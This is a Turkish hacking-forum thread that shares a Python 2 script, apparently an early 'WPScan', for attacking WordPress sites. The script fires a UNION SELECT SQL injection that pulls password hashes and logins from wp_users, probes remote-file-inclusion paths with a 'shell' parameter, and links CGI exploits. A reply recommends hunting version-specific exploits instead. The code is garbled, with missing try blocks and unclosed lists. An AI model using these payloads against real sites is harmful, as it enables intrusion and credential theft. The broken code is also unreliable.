Wordprees SQL RFI CGI scanner


Katılımcı Üye
2 May 2012
#WordPress SQL/RFI/CGI scanner. SQL will check
#for md5's in the source and RFI/CGI will use

Hacker.ps (NardanAdam)

Açıklama : Hedef Sitede kendisine göre ayarlanmış açıklar vardır Wp Scanner bi Scriptir SQl RFI CGI Scanner dir #!/usr/bin/python yazıldıgı bellirdir pyton indirmelisiz linkte vereyim

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#!/usr/bin/python #WordPress SQL/RFI/CGI scanner. SQL will check  
#for md5's in the source and RFI/CGI will use  
#http responses.  


import sys, urllib2, re, time, httplib 

#Bad HTTP Responses  
BAD_RESP = [400,401,404] 

def main(path): 
    print "[+] Testing:",host.split("/",1)[1]+path 
        h = httplib.HTTP(host.split("/",1)[0]) 
        h.putrequest("HEAD", "/"+host.split("/",1)[1]+path) 
        h.putheader("Host", host.split("/",1)[0]) 
        resp, reason, headers = h.getreply() 
        return resp, reason, headers.get("Server") 
    except(), msg:  
        print "Error Occurred:",msg 

def timer(): 
    now = time.localtime(time.time()) 
    return time.asctime(now) 

print "\n\t   d3hydr8[at]gmail[dot]com WPScan v1.0" 
print "\t------------------------------------------" 

sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*", 

rfis = {"plugins/Enigma2.php":"index/wp-content/plugins/Enigma2.php?boarddir=shell", 

cgis = {"wp-trackback.php":"http://milw0rm.com/exploits/3095",  

if len(sys.argv) != 2: 
    print "\nUsage: ./wpscan.py <site+dir>" 
    print "Ex: ./wpscan.py www.site.com/wp-content/\n" 

host = sys.argv[1].replace("http://","").rsplit("/",1)[0] 
if host[-1] != "/": 
    host = host+"/" 
print "\n[+] Site:",host 
print "[+] SQL Loaded:",len(sqls)  
print "[+] RFI Loaded:",len(rfis)  
print "[+] CGI Loaded:",len(cgis)  

server = main("/")[2] 
print "[+] Server:",server 

print "\n[+] Started:",timer() 

print "\n[+] Scanning: SQL\n" 
for sql in sqls: 
    time.sleep(2) #Change this if needed 
    print "[+] Trying:",sql.replace("\n","") 
        source = urllib2.urlopen("http://"+host+sql.replace("\n","")).read() 
        md5s = re.findall("[a-f0-9]"*32,source) 
        if len(md5s) >= 1: 
            print "[!]",host+sql.replace("\n","") 
            for md5 in md5s: 
                print "\n\t[+]MD5:",md5 
print "\n[+] Scanning: RFI\n" 
for rfi, shell in rfis.items(): 
    resp,reason,server = main(rfi) 
    if resp not in BAD_RESP: 
        print "\t[+] Got:",resp, reason 
        print "\t[+] Try:",host+shell 
        print "\t[-] Got:",resp, reason 
print "\n[+] Scanning: CGI\n" 
for cgi, expl in cgis.items(): 
    resp,reason,server = main(cgi) 
    if resp not in BAD_RESP: 
        print "\t[+] Got:",resp, reason 
        print "\t[+] Check:",expl 
        print "\t[-] Got:",resp, reason 
print "\n[-] Done\n"

Bug ReSearcher

Katılımcı Üye
18 Eki 2011
gerek yok çünkü sürümden sürüme zaten açıklar değişiyor. onun yerine hedef sitedeki sürümün exploitlerini aramak daha iyi sonuçlar verir.

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